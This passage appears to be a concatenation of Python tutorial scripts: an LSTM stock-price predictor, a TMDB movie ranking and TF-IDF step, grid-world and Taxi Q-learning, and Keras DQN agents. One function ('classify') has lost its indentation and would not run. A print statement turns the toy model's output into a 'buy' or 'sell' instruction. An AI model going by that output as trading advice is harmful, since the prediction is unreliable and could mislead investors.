        self.model_name = f"{time_now}_{stock}-{feature_columns_str}-loss-{self.loss}-{self.cell.__name__}-seq-{self.n_steps}-step-{self.lookup_step}-layers-{self.n_layers}-units-{self.units}"

    def _get_df_name(self):
        """Returns the updated dataframe name"""
        time_now = time.strftime("%Y-%m-%d")
        return f"data/{self.ticker_name}_{time_now}.csv"

    def _df_exists(self):
        """Check if the updated dataframe exists in disk, returns a tuple contains (filename, file_exists)"""
        filename = self._get_df_name()
        return filename, os.path.isfile(filename)

    def _get_model_filename(self):
        """Returns the relative path of this model name with h5 extension"""
        return f"results/{self.model_name}.h5"

    def _model_exists(self):
        """Checks if model already exists in disk, returns the filename,
        returns None otherwise"""
        filename = self._get_model_filename()
        return filename if os.path.isfile(filename) else None
# uncomment below to use CPU instead of GPU
# import os
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=4,
# inter_op_parallelism_threads=4,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
from tensorflow.keras.layers import GRU, LSTM
from price_prediction import PricePrediction
# ticker to train/predict for
ticker = "AAPL"
# build the predictor with an LSTM regression model over OHLCV features
p = PricePrediction(ticker, feature_columns=['adjclose', 'volume', 'open', 'high', 'low'],
                    epochs=700, cell=LSTM, optimizer="rmsprop", n_layers=3, units=256,
                    loss="mse", shuffle=True, dropout=0.4)
# override=True forces retraining even if saved weights exist on disk
p.train(True)
print(f"The next predicted price for {ticker} is {p.predict()}")
# classify=True maps the prediction to 0 (sell) / 1 (buy)
buy_sell = p.predict(classify=True)
print(f"you should {'sell' if buy_sell == 0 else 'buy'}.")
print("Mean Absolute Error:", p.get_MAE())
print("Mean Squared Error:", p.get_MSE())
print(f"Accuracy: {p.get_accuracy()*100:.3f}%")
p.plot_test_set()
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from sklearn import preprocessing
from yahoo_fin import stock_info as si
from collections import deque
import pandas as pd
import numpy as np
import random
def create_model(input_length, units=256, cell=LSTM, n_layers=2, dropout=0.3, loss="mean_absolute_error", optimizer="rmsprop"):
    """Build and compile a stacked recurrent regression model.

    :param input_length: number of features per timestep (time axis is unbounded)
    :param units: units per recurrent layer
    :param cell: recurrent layer class (e.g. LSTM, GRU)
    :param n_layers: number of recurrent layers
    :param dropout: dropout rate applied after every recurrent layer
    :param loss: training loss
    :param optimizer: training optimizer
    :return: compiled keras Sequential model with a single linear output
    """
    model = Sequential()
    last_layer = n_layers - 1
    for layer_index in range(n_layers):
        if layer_index == 0:
            # first layer declares the input shape
            model.add(cell(units, return_sequences=True, input_shape=(None, input_length)))
        elif layer_index == last_layer:
            # last recurrent layer collapses the sequence to a vector
            model.add(cell(units, return_sequences=False))
        else:
            # middle layers keep the full sequence
            model.add(cell(units, return_sequences=True))
        model.add(Dropout(dropout))
    model.add(Dense(1, activation="linear"))
    model.compile(loss=loss, metrics=["mean_absolute_error"], optimizer=optimizer)
    return model
def load_data(ticker, n_steps=60, scale=True, split=True, balance=False, shuffle=True,
              lookup_step=1, test_size=0.15, price_column='Price', feature_columns=['Price'],
              target_column="future", buy_sell=False):
    """Loads data from yahoo finance, if the ticker is a pd Dataframe,
    it'll use it instead

    Returns a dict with (depending on flags): the raw 'df', 'column_scaler',
    'last_sequence', and either 'X'/'y' (split=False) or
    'X_train'/'X_test'/'y_train'/'y_test' plus, when shuffle=True,
    'unshuffled_X_test'/'unshuffled_y_test'.

    NOTE(review): feature_columns uses a mutable default list — it is never
    mutated here, but callers should not rely on sharing it.
    """
    if isinstance(ticker, str):
        df = si.get_data(ticker)
    elif isinstance(ticker, pd.DataFrame):
        df = ticker
    else:
        raise TypeError("ticker can be either a str, or a pd.DataFrame instance")
    result = {}
    result['df'] = df.copy()
    # make sure that columns passed is in the dataframe
    for col in feature_columns:
        assert col in df.columns
    column_scaler = {}
    if scale:
        # scale the data ( from 0 to 1 ), one scaler per feature column
        for column in feature_columns:
            scaler = preprocessing.MinMaxScaler()
            df[column] = scaler.fit_transform(np.expand_dims(df[column].values, axis=1))
            column_scaler[column] = scaler
            # df[column] = preprocessing.scale(df[column].values)
    # add column scaler to the result
    result['column_scaler'] = column_scaler
    # add future price column ( shift by -1 )
    df[target_column] = df[price_column].shift(-lookup_step)
    # get last feature elements ( to add them to the last sequence )
    # before deleted by df.dropna
    last_feature_element = np.array(df[feature_columns].tail(1))
    # clean NaN entries
    df.dropna(inplace=True)
    if buy_sell:
        # convert target column to 0 (for sell -down- ) and to 1 ( for buy -up-)
        df[target_column] = list(map(classify, df[price_column], df[target_column]))
    seq_data = []  # all sequences here
    # sequences are made with deque, which keeps the maximum length by popping out older values as new ones come in
    sequences = deque(maxlen=n_steps)
    for entry, target in zip(df[feature_columns].values, df[target_column].values):
        sequences.append(entry)
        if len(sequences) == n_steps:
            seq_data.append([np.array(sequences), target])
    # get the last sequence for future predictions
    last_sequence = np.array(sequences)
    # shift the sequence, one element is missing ( deleted by dropna )
    last_sequence = shift(last_sequence, -1)
    # fill the last element
    last_sequence[-1] = last_feature_element
    # add last sequence to results
    result['last_sequence'] = last_sequence
    if buy_sell and balance:
        # keep an equal number of buy and sell samples
        buys, sells = [], []
        for seq, target in seq_data:
            if target == 0:
                sells.append([seq, target])
            else:
                buys.append([seq, target])
        # balancing the dataset
        lower_length = min(len(buys), len(sells))
        buys = buys[:lower_length]
        sells = sells[:lower_length]
        seq_data = buys + sells
    if shuffle:
        # keep an unshuffled copy so metrics can be computed in time order
        unshuffled_seq_data = seq_data.copy()
        # shuffle data
        random.shuffle(seq_data)
    X, y = [], []
    for seq, target in seq_data:
        X.append(seq)
        y.append(target)
    X = np.array(X)
    y = np.array(y)
    if shuffle:
        unshuffled_X, unshuffled_y = [], []
        for seq, target in unshuffled_seq_data:
            unshuffled_X.append(seq)
            unshuffled_y.append(target)
        unshuffled_X = np.array(unshuffled_X)
        unshuffled_y = np.array(unshuffled_y)
        # NOTE(review): reshape swaps the (steps, features) axes without
        # transposing the data — downstream code uses the same layout, but
        # confirm this is the intended representation.
        unshuffled_X = unshuffled_X.reshape((unshuffled_X.shape[0], unshuffled_X.shape[2], unshuffled_X.shape[1]))
    X = X.reshape((X.shape[0], X.shape[2], X.shape[1]))
    if not split:
        # return original_df, X, y, column_scaler, last_sequence
        result['X'] = X
        result['y'] = y
        return result
    else:
        # split dataset into training and testing (chronological split)
        n_samples = X.shape[0]
        train_samples = int(n_samples * (1 - test_size))
        result['X_train'] = X[:train_samples]
        result['X_test'] = X[train_samples:]
        result['y_train'] = y[:train_samples]
        result['y_test'] = y[train_samples:]
        if shuffle:
            result['unshuffled_X_test'] = unshuffled_X[train_samples:]
            result['unshuffled_y_test'] = unshuffled_y[train_samples:]
        return result
# from sentdex
def classify(current, future):
if float(future) > float(current): # if the future price is higher than the current, that's a buy, or a 1
return 1
else: # otherwise... it's a 0!
return 0
def shift(arr, num, fill_value=np.nan):
    """Shift `arr` by `num` positions, padding the vacated slots with
    `fill_value`. Positive `num` shifts right, negative shifts left; num == 0
    returns `arr` itself unchanged."""
    if num == 0:
        return arr
    shifted = np.empty_like(arr)
    if num > 0:
        shifted[:num] = fill_value
        shifted[num:] = arr[:-num]
    else:
        shifted[num:] = fill_value
        shifted[:num] = arr[-num:]
    return shifted
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.feature_extraction.text import TfidfVectorizer
# paths to the TMDB 5000 dataset CSVs
movies_path = r"E:\datasets\recommender_systems\tmdb_5000_movies.csv"
credits_path = r"E:\datasets\recommender_systems\tmdb_5000_credits.csv"
credits = pd.read_csv(credits_path)
movies = pd.read_csv(movies_path)
# rename movie_id to id to merge dataframes later
credits = credits.rename(index=str, columns={'movie_id': 'id'})
# join on movie id column
movies = movies.merge(credits, on="id")
# drop useless columns
movies = movies.drop(columns=['homepage', 'title_x', 'title_y', 'status', 'production_countries'])
# number of votes of the movie
V = movies['vote_count']
# rating average of the movie from 0 to 10
R = movies['vote_average']
# the mean vote across the whole report
C = movies['vote_average'].mean()
# minimum votes required to be listed in the top 250 (70th percentile of counts)
m = movies['vote_count'].quantile(0.7)
# IMDB-style weighted rating: blends each movie's own rating with the global
# mean, weighted by how many votes it has relative to the threshold m
movies['weighted_average'] = (V/(V+m) * R) + (m/(m+V) * C)
# ranked movies
wavg = movies.sort_values('weighted_average', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=wavg['weighted_average'].head(10), y=wavg['original_title'].head(10), data=wavg, palette='deep')
plt.xlim(6.75, 8.35)
plt.title('"Best" Movies by TMDB Votes', weight='bold')
plt.xlabel('Weighted Average Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('best_movies.png')
# same chart, ranked by raw popularity instead of weighted rating
popular = movies.sort_values('popularity', ascending=False)
plt.figure(figsize=(16,6))
ax = sns.barplot(x=popular['popularity'].head(10), y=popular['original_title'].head(10), data=popular, palette='deep')
plt.title('"Most Popular" Movies by TMDB Votes', weight='bold')
plt.xlabel('Popularity Score', weight='bold')
plt.ylabel('Movie Title', weight='bold')
plt.savefig('popular_movies.png')
############ Content-Based ############
# filling NaNs with empty string
movies['overview'] = movies['overview'].fillna('')
# TF-IDF over the plot overviews (1- to 3-grams, english stop words removed)
tfv = TfidfVectorizer(min_df=3, max_features=None,
                      strip_accents='unicode', analyzer='word', token_pattern=r'\w{1,}',
                      ngram_range=(1, 3), use_idf=1, smooth_idf=1, sublinear_tf=1,
                      stop_words = 'english')
tfv_matrix = tfv.fit_transform(movies['overview'])
print(tfv_matrix.shape)
print(tfv_matrix)
import numpy as np
from PIL import Image
import cv2 # showing the env
import matplotlib.pyplot as plt
import pickle
from matplotlib import style
import time
import os
from collections.abc import Iterable
style.use("ggplot")
# side length of the square grid world
GRID_SIZE = 10
# how many episodes
EPISODES = 1_000
# how many steps in the env
STEPS = 200
# Rewards for differents events
MOVE_REWARD = -1
ENEMY_REWARD = -300
FOOD_REWARD = 30
epsilon = 0  # for randomness, it'll decay over time by EPSILON_DECAY
EPSILON_DECAY = 0.999993  # every episode, epsilon *= EPSILON_DECAY
# render/print stats every SHOW_EVERY episodes
SHOW_EVERY = 1
q_table = f"qtable-grid-{GRID_SIZE}-steps-{STEPS}.npy"  # put here pretrained model ( if exists )
# Q-learning hyperparameters
LEARNING_RATE = 0.1
DISCOUNT = 0.95
# integer codes identifying each entity on the grid
PLAYER_CODE = 1
FOOD_CODE = 2
ENEMY_CODE = 3
# blob dict, for colors
COLORS = {
    PLAYER_CODE: (255, 120, 0),  # blueish color
    FOOD_CODE: (0, 255, 0),  # green
    ENEMY_CODE: (0, 0, 255),  # red
}
# action code -> (dx, dy) movement vector
ACTIONS = {
    0: (0, 1),
    1: (-1, 0),
    2: (0, -1),
    3: (1, 0)
}
N_ENEMIES = 2
def get_observation(cords):
    """Flatten a collection of (dx, dy) pairs into one tuple, offsetting every
    component by GRID_SIZE-1 so all values are non-negative array indices."""
    return tuple(delta + GRID_SIZE - 1 for pair in cords for delta in pair)
class Blob:
    """A square entity on the grid, spawned at a random position."""

    def __init__(self, name=None):
        # random spawn anywhere on the grid
        self.x = np.random.randint(0, GRID_SIZE)
        self.y = np.random.randint(0, GRID_SIZE)
        self.name = name or "Blob"

    def __sub__(self, other):
        """Relative (dx, dy) offset between this blob and another."""
        return (self.x - other.x, self.y - other.y)

    def __str__(self):
        return f"<{self.name.capitalize()} x={self.x}, y={self.y}>"

    def move(self, x=None, y=None):
        """Move by (x, y); a None component becomes a random step in -1..1.
        The resulting position is clamped to the grid bounds."""
        dx = np.random.randint(-1, 2) if x is None else x
        dy = np.random.randint(-1, 2) if y is None else y
        self.x += dx
        self.y += dy
        # clamp to [0, GRID_SIZE-1]
        self.x = min(max(self.x, 0), GRID_SIZE - 1)
        self.y = min(max(self.y, 0), GRID_SIZE - 1)

    def take_action(self, choice):
        """Apply the movement vector that ACTIONS maps `choice` to; unknown
        action codes are ignored (same as the original lookup loop)."""
        move_vector = ACTIONS.get(choice)
        if move_vector is not None:
            self.move(x=move_vector[0], y=move_vector[1])
# construct the q_table if not already trained
if q_table is None or not os.path.isfile(q_table):
    # q_table = {}
    # # for every possible combination of the distance of the player
    # # to both the food and the enemy
    # for i in range(-GRID_SIZE+1, GRID_SIZE):
    #     for ii in range(-GRID_SIZE+1, GRID_SIZE):
    #         for iii in range(-GRID_SIZE+1, GRID_SIZE):
    #             for iiii in range(-GRID_SIZE+1, GRID_SIZE):
    #                 q_table[(i, ii), (iii, iiii)] = np.random.uniform(-5, 0, size=len(ACTIONS))
    # one axis per relative coordinate (2 for the food + 2 per enemy), each of
    # size 2*GRID_SIZE-1, plus a final axis holding one Q value per action;
    # initialized with random negatives
    q_table = np.random.uniform(-5, 0, size=[GRID_SIZE*2-1]*(2+2*N_ENEMIES) + [len(ACTIONS)])
else:
    # the q table already exists on disk, load it
    print("Loading Q-table")
    q_table = np.load(q_table)
# this list for tracking rewards
episode_rewards = []
# game loop
for episode in range(EPISODES):
    # initialize our blobs ( squares ) at fresh random positions
    player = Blob("Player")
    food = Blob("Food")
    enemy1 = Blob("Enemy1")
    enemy2 = Blob("Enemy2")
    if episode % SHOW_EVERY == 0:
        print(f"[{episode:05}] ep: {epsilon:.4f} reward mean: {np.mean(episode_rewards[-SHOW_EVERY:])} alpha={LEARNING_RATE}")
        show = True
    else:
        show = False
    episode_reward = 0
    for i in range(STEPS):
        # get the observation (relative positions to food and both enemies)
        obs = get_observation((player - food, player - enemy1, player - enemy2))
        # Epsilon-greedy policy
        if np.random.random() > epsilon:
            # get the action from the q table
            action = np.argmax(q_table[obs])
        else:
            # random action
            action = np.random.randint(0, len(ACTIONS))
        # take the action
        player.take_action(action)
        #### MAYBE ###
        #enemy.move()
        #food.move()
        ##############
        # food and enemies take random steps each turn
        food.move()
        enemy1.move()
        enemy2.move()
        ### for rewarding
        if player.x == enemy1.x and player.y == enemy1.y:
            # if it hit the enemy, punish
            reward = ENEMY_REWARD
        elif player.x == enemy2.x and player.y == enemy2.y:
            # if it hit the enemy, punish
            reward = ENEMY_REWARD
        elif player.x == food.x and player.y == food.y:
            # if it hit the food, reward
            reward = FOOD_REWARD
        else:
            # else, punish it a little for moving
            reward = MOVE_REWARD
        ### calculate the Q
        # get the future observation after taking action
        future_obs = get_observation((player - food, player - enemy1, player - enemy2))
        # get the max future Q value (SarsaMax algorithm)
        # SARSA = State0, Action0, Reward0, State1, Action1
        max_future_q = np.max(q_table[future_obs])
        # get the current Q
        current_q = q_table[obs][action]
        # calculate the new Q
        if reward == FOOD_REWARD:
            # terminal success: pin the Q value to the food reward
            new_q = FOOD_REWARD
        else:
            # value iteration update
            # https://en.wikipedia.org/wiki/Q-learning
            # Calculate the Temporal-Difference target
            td_target = reward + DISCOUNT * max_future_q
            # Temporal-Difference
            new_q = (1 - LEARNING_RATE) * current_q + LEARNING_RATE * td_target
        # update the q
        q_table[obs][action] = new_q
        if show:
            # render the grid as an RGB image, one colored pixel per blob
            env = np.zeros((GRID_SIZE, GRID_SIZE, 3), dtype=np.uint8)
            # set food blob to green
            env[food.x][food.y] = COLORS[FOOD_CODE]
            # set the enemy blob to red
            env[enemy1.x][enemy1.y] = COLORS[ENEMY_CODE]
            env[enemy2.x][enemy2.y] = COLORS[ENEMY_CODE]
            # set the player blob to blueish
            env[player.x][player.y] = COLORS[PLAYER_CODE]
            # get the image
            image = Image.fromarray(env, 'RGB')
            image = image.resize((600, 600))
            # show the image
            cv2.imshow("image", np.array(image))
            # pause longer on terminal events so the outcome is visible; 'q' quits
            if reward == FOOD_REWARD or reward == ENEMY_REWARD:
                if cv2.waitKey(500) == ord('q'):
                    break
            else:
                if cv2.waitKey(100) == ord('q'):
                    break
        episode_reward += reward
        # episode ends when the player reaches the food or an enemy
        if reward == FOOD_REWARD or reward == ENEMY_REWARD:
            break
    episode_rewards.append(episode_reward)
    # decay a little randomness in each episode
    epsilon *= EPSILON_DECAY
# with open(f"qtable-{int(time.time())}.pickle", "wb") as f:
# pickle.dump(q_table, f)
np.save(f"qtable-grid-{GRID_SIZE}-steps-{STEPS}", q_table)
moving_avg = np.convolve(episode_rewards, np.ones((SHOW_EVERY,))/SHOW_EVERY, mode='valid')
plt.plot([i for i in range(len(moving_avg))], moving_avg)
plt.ylabel(f"Avg Reward every {SHOW_EVERY}")
plt.xlabel("Episode")
plt.show()
import numpy as np
import gym
import random
import matplotlib.pyplot as plt
import os
import time

# Tabular Q-learning on the Gym Taxi-v2 environment, followed by a greedy
# rollout that renders the learned policy.
env = gym.make("Taxi-v2").env
# init the Q-Table
# (500x6) matrix (n_states x n_actions)
q_table = np.zeros((env.observation_space.n, env.action_space.n))

# Hyper Parameters
# alpha
LEARNING_RATE = 0.1
# gamma
DISCOUNT_RATE = 0.9
EPSILON = 0.9
EPSILON_DECAY = 0.99993
EPISODES = 100_000
SHOW_EVERY = 1_000

# for plotting metrics
all_epochs = []
all_penalties = []
all_rewards = []

for i in range(EPISODES):
    # reset the env
    state = env.reset()
    epochs, penalties, rewards = 0, 0, []
    done = False
    while not done:
        if random.random() < EPSILON:
            # exploration
            action = env.action_space.sample()
        else:
            # exploitation
            action = np.argmax(q_table[state])
        next_state, reward, done, info = env.step(action)
        old_q = q_table[state, action]
        future_q = np.max(q_table[next_state])
        # calculate the new Q ( Q-Learning equation, i.e SARSAMAX )
        new_q = (1 - LEARNING_RATE) * old_q + LEARNING_RATE * ( reward + DISCOUNT_RATE * future_q)
        # update the new Q
        q_table[state, action] = new_q
        # a -10 reward marks an illegal pickup/dropoff in Taxi-v2
        if reward == -10:
            penalties += 1
        state = next_state
        epochs += 1
        rewards.append(reward)
    if i % SHOW_EVERY == 0:
        print(f"[{i}] avg reward:{np.average(all_rewards):.4f} eps:{EPSILON:.4f}")
        # env.render()
    all_epochs.append(epochs)
    all_penalties.append(penalties)
    all_rewards.append(np.average(rewards))
    # decay exploration after each episode
    EPSILON *= EPSILON_DECAY
# env.render()
# plt.plot(list(range(len(all_rewards))), all_rewards)
# plt.show()

# greedy rollout of the learned policy, rendered step by step
print("Playing in 5 seconds...")
time.sleep(5)
os.system("cls") if "nt" in os.name else os.system("clear")
# render
state = env.reset()
done = False
while not done:
    action = np.argmax(q_table[state])
    state, reward, done, info = env.step(action)
    env.render()
    time.sleep(0.2)
    os.system("cls") if "nt" in os.name else os.system("clear")
env.render()
import cv2
from PIL import Image
import os
# to use CPU uncomment below code
# os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
# import tensorflow as tf
# config = tf.ConfigProto(intra_op_parallelism_threads=5,
# inter_op_parallelism_threads=5,
# allow_soft_placement=True,
# device_count = {'CPU' : 1,
# 'GPU' : 0}
# )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Activation, Flatten
from keras.optimizers import Adam
# training-run hyperparameters
EPISODES = 5_000  # number of training episodes
REPLAY_MEMORY_MAX = 20_000  # replay buffer capacity
MIN_REPLAY_MEMORY = 1_000  # minimum buffer fill before replay training starts
SHOW_EVERY = 50  # size of the rolling reward-statistics window
RENDER_EVERY = 100  # render interval (episodes)
LEARN_EVERY = 50  # train every this many environment steps
GRID_SIZE = 20  # side length of the square grid
ACTION_SIZE = 9  # number of discrete actions
class Blob:
    """A blob on a `size` x `size` grid, spawned at a random cell."""

    def __init__(self, size):
        self.size = size
        self.x = np.random.randint(0, size)
        self.y = np.random.randint(0, size)

    def __str__(self):
        return f"Blob ({self.x}, {self.y})"

    def __sub__(self, other):
        # relative offset from `other` to this blob
        return (self.x-other.x, self.y-other.y)

    def __eq__(self, other):
        return self.x == other.x and self.y == other.y

    def action(self, choice):
        '''
        Gives us 9 total movement options. (0,1,2,3,4,5,6,7,8)
        (diagonals, straight moves, and 8 = stand still)
        '''
        if choice == 0:
            self.move(x=1, y=1)
        elif choice == 1:
            self.move(x=-1, y=-1)
        elif choice == 2:
            self.move(x=-1, y=1)
        elif choice == 3:
            self.move(x=1, y=-1)
        elif choice == 4:
            self.move(x=1, y=0)
        elif choice == 5:
            self.move(x=-1, y=0)
        elif choice == 6:
            self.move(x=0, y=1)
        elif choice == 7:
            self.move(x=0, y=-1)
        elif choice == 8:
            self.move(x=0, y=0)

    def move(self, x=False, y=False):
        # BUGFIX: test `is False` instead of truthiness. With `if not x:` a
        # deliberate delta of 0 (used by actions 4-8) was indistinguishable
        # from "no value given" and got replaced by a random step. The other
        # Blob class in this file already uses the `is False` check.
        # If no value for x, move randomly
        if x is False:
            self.x += np.random.randint(-1, 2)
        else:
            self.x += x
        # If no value for y, move randomly
        if y is False:
            self.y += np.random.randint(-1, 2)
        else:
            self.y += y
        # If we are out of bounds, fix!
        if self.x < 0:
            self.x = 0
        elif self.x > self.size-1:
            self.x = self.size-1
        if self.y < 0:
            self.y = 0
        elif self.y > self.size-1:
            self.y = self.size-1
class BlobEnv:
    """Grid world with a player, one food blob (reward) and one enemy (penalty)."""

    RETURN_IMAGES = True
    MOVE_PENALTY = 1
    ENEMY_PENALTY = 300
    FOOD_REWARD = 25
    ACTION_SPACE_SIZE = 9
    PLAYER_N = 1  # player key in dict
    FOOD_N = 2  # food key in dict
    ENEMY_N = 3  # enemy key in dict
    # blob code -> color used when rasterizing the grid
    d = {1: (255, 175, 0),
         2: (0, 255, 0),
         3: (0, 0, 255)}

    def __init__(self, size):
        self.SIZE = size
        self.OBSERVATION_SPACE_VALUES = (self.SIZE, self.SIZE, 3)  # 4

    def reset(self):
        """Respawn all blobs on distinct cells and return the first observation."""
        self.player = Blob(self.SIZE)
        self.food = Blob(self.SIZE)
        while self.food == self.player:
            self.food = Blob(self.SIZE)
        self.enemy = Blob(self.SIZE)
        while self.enemy == self.player or self.enemy == self.food:
            self.enemy = Blob(self.SIZE)
        self.episode_step = 0
        return self._observe()

    def _observe(self):
        # image observation or relative-offset tuple, per RETURN_IMAGES
        if self.RETURN_IMAGES:
            return np.array(self.get_image())
        return (self.player - self.food) + (self.player - self.enemy)

    def step(self, action):
        """Advance one tick: apply `action` to the player, score, and report.

        Returns (observation, reward, done); episodes cap at 200 steps.
        """
        self.episode_step += 1
        self.player.action(action)
        new_observation = self._observe()
        if self.player == self.enemy:
            reward, done = -self.ENEMY_PENALTY, True
        elif self.player == self.food:
            reward, done = self.FOOD_REWARD, True
        else:
            reward = -self.MOVE_PENALTY
            done = self.episode_step >= 200
        return new_observation, reward, done

    def render(self):
        """Display the current grid, scaled up, via OpenCV."""
        frame = self.get_image().resize((300, 300))
        cv2.imshow("image", np.array(frame))
        cv2.waitKey(1)

    # FOR CNN #
    def get_image(self):
        """Rasterize the grid into a SIZE x SIZE RGB PIL image."""
        grid = np.zeros((self.SIZE, self.SIZE, 3), dtype=np.uint8)
        grid[self.food.x][self.food.y] = self.d[self.FOOD_N]
        grid[self.enemy.x][self.enemy.y] = self.d[self.ENEMY_N]
        grid[self.player.x][self.player.y] = self.d[self.PLAYER_N]
        return Image.fromarray(grid, 'RGB')
class DQNAgent:
    """DQN agent with online + target networks over image observations.

    `model` is trained continuously via replay(); `target_model` supplies the
    bootstrap targets and is synced with update_target_model() (called at
    episode end by the __main__ loop below).
    """

    def __init__(self, state_size, action_size):
        # state_size: observation shape (H, W, C); action_size: discrete action count
        self.state_size = state_size
        self.action_size = action_size
        # replay buffer of (state, action, reward, next_state, done) transitions
        self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
        # discount rate
        self.gamma = 0.95
        # exploration rate
        self.epsilon = 1.0
        self.epsilon_min = 0.01
        self.epsilon_decay = 0.9997
        self.learning_rate = 0.001
        # models to be built
        # Dual
        self.model = self.build_model()
        self.target_model = self.build_model()
        self.update_target_model()

    def build_model(self):
        """Builds the DQN Model"""
        # Neural network for Deep-Q Learning Model
        model = Sequential()
        model.add(Conv2D(256, (3, 3), input_shape=self.state_size))
        model.add(Activation("relu"))
        model.add(MaxPooling2D(pool_size=(2, 2)))
        model.add(Dropout(0.2))
        model.add(Conv2D(256, (3, 3)))
        model.add(Activation("relu"))
        model.add(MaxPooling2D(pool_size=(2, 2)))
        model.add(Dropout(0.2))
        model.add(Flatten())  # this converts our 3D feature maps to 1D feature vectors
        model.add(Dense(32))
        # output layer: one linear Q-value per action
        model.add(Dense(self.action_size, activation="linear"))
        model.compile(loss="mse", optimizer=Adam(lr=self.learning_rate))
        return model

    def update_target_model(self):
        """Copy weights from self.model to self.target_model"""
        self.target_model.set_weights(self.model.get_weights())

    def remember(self, state, action, reward, next_state, done):
        """Adds a sample to the memory"""
        # for images, expand dimension, comment if you are not using images as states
        # pixel values are scaled to [0, 1] before storing
        state = state / 255
        next_state = next_state / 255
        state = np.expand_dims(state, axis=0)
        next_state = np.expand_dims(next_state, axis=0)
        self.memory.append((state, action, reward, next_state, done))

    def act(self, state):
        """Takes action using Epsilon-Greedy Policy"""
        if np.random.random() <= self.epsilon:
            return random.randint(0, self.action_size-1)
        else:
            # normalize exactly like remember() so inference matches training
            state = state / 255
            state = np.expand_dims(state, axis=0)
            act_values = self.model.predict(state)
            # print("act_values:", act_values.shape)
            return np.argmax(act_values[0])

    def replay(self, batch_size):
        """Train on a replay memory with a batch_size of samples"""
        # wait until enough experience has accumulated
        if len(self.memory) < MIN_REPLAY_MEMORY:
            return
        minibatch = random.sample(self.memory, batch_size)
        for state, action, reward, next_state, done in minibatch:
            target = reward
            if not done:
                # bootstrap from the frozen target network for stability
                target = ( reward + self.gamma * np.max(self.target_model.predict(next_state)[0]) )
            target_f = self.model.predict(state)
            target_f[0][action] = target
            # NOTE(review): fits one transition at a time (batch_size=1) — slow
            self.model.fit(state, target_f, epochs=1, verbose=0, batch_size=1)
        # decay epsilon if possible
        self.epsilon = max(self.epsilon * self.epsilon_decay, self.epsilon_min)

    def load(self, name):
        """Load saved weights into both networks."""
        self.model.load_weights(name)
        self.target_model.load_weights(name)

    def save(self, name):
        """Persist network weights to `name`."""
        self.model.save_weights(name)
        self.target_model.save_weights(name)
if __name__ == "__main__":
    batch_size = 64
    env = BlobEnv(GRID_SIZE)
    agent = DQNAgent(env.OBSERVATION_SPACE_VALUES, ACTION_SIZE)
    # rolling window of recent episode rewards, seeded with a pessimistic value
    ep_rewards = deque([-200], maxlen=SHOW_EVERY)
    avg_rewards = []
    min_rewards = []
    max_rewards = []
    for episode in range(1, EPISODES+1):
        # restarting episode => reset episode reward and step number
        episode_reward = 0
        step = 1
        # reset env and get init state
        current_state = env.reset()
        done = False
        while True:
            # take action
            action = agent.act(current_state)
            next_state, reward, done = env.step(action)
            episode_reward += reward
            if episode % RENDER_EVERY == 0:
                env.render()
            # add transition to agent's memory
            agent.remember(current_state, action, reward, next_state, done)
            # train only every LEARN_EVERY steps to amortize the replay cost
            if step % LEARN_EVERY == 0:
                agent.replay(batch_size=batch_size)
            current_state = next_state
            step += 1
            if done:
                # sync the target network at episode end
                agent.update_target_model()
                break
        # record rolling min / mean / max statistics over the reward window
        ep_rewards.append(episode_reward)
        avg_reward = np.mean(ep_rewards)
        min_reward = min(ep_rewards)
        max_reward = max(ep_rewards)
        avg_rewards.append(avg_reward)
        min_rewards.append(min_reward)
        max_rewards.append(max_reward)
        print(f"[{episode}] avg:{avg_reward:.2f} min:{min_reward} max:{max_reward} eps:{agent.epsilon:.4f}")
        # if episode % SHOW_EVERY == 0:
        #     print(f"[{episode}] avg: {avg_reward} min: {min_reward} max: {max_reward} eps: {agent.epsilon:.4f}")
    # plot avg (blue), min (red) and max (green) reward curves
    episodes = list(range(EPISODES))
    plt.plot(episodes, avg_rewards, c='b')
    plt.plot(episodes, min_rewards, c='r')
    plt.plot(episodes, max_rewards, c='g')
    plt.show()
    agent.save("blob_v1.h5")
import os
# to use CPU uncomment below code
# NOTE(review): the two lines below are active, so this script is pinned to CPU
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"   # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# TF1-style session config limiting parallelism and disabling the GPU
# NOTE(review): `config` is built here but never passed to a session below
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
import random
import gym
import numpy as np
import matplotlib.pyplot as plt
from collections import deque
from keras.models import Sequential
from keras.layers import Dense
from keras.optimizers import Adam

# training-run hyperparameters
EPISODES = 5_000  # number of training episodes
REPLAY_MEMORY_MAX = 2_000  # replay buffer capacity
SHOW_EVERY = 500  # console-report interval (episodes)
RENDER_EVERY = 1_000  # render interval (episodes)
class DQNAgent:
    """DQN agent with online + target networks over flat state vectors.

    `target_model` supplies the bootstrap targets in replay() and is synced
    from `model` via update_target_model() (called at episode end below).
    """

    def __init__(self, state_size, action_size):
        # state_size: observation vector length; action_size: discrete action count
        self.state_size = state_size
        self.action_size = action_size
        # replay buffer of (state, action, reward, next_state, done) transitions
        self.memory = deque(maxlen=REPLAY_MEMORY_MAX)
        # discount rate
        self.gamma = 0.95
        # exploration rate
        self.epsilon = 1.0
        self.epsilon_min = 0.01
        self.epsilon_decay = 0.9997
        self.learning_rate = 0.001
        # models to be built
        # Dual
        self.model = self.build_model()
        self.target_model = self.build_model()
        self.update_target_model()

    def build_model(self):
        """Builds the DQN Model"""
        # Neural network for Deep-Q Learning Model
        model = Sequential()
        model.add(Dense(32, input_dim=self.state_size, activation="relu"))
        model.add(Dense(32, activation="relu"))
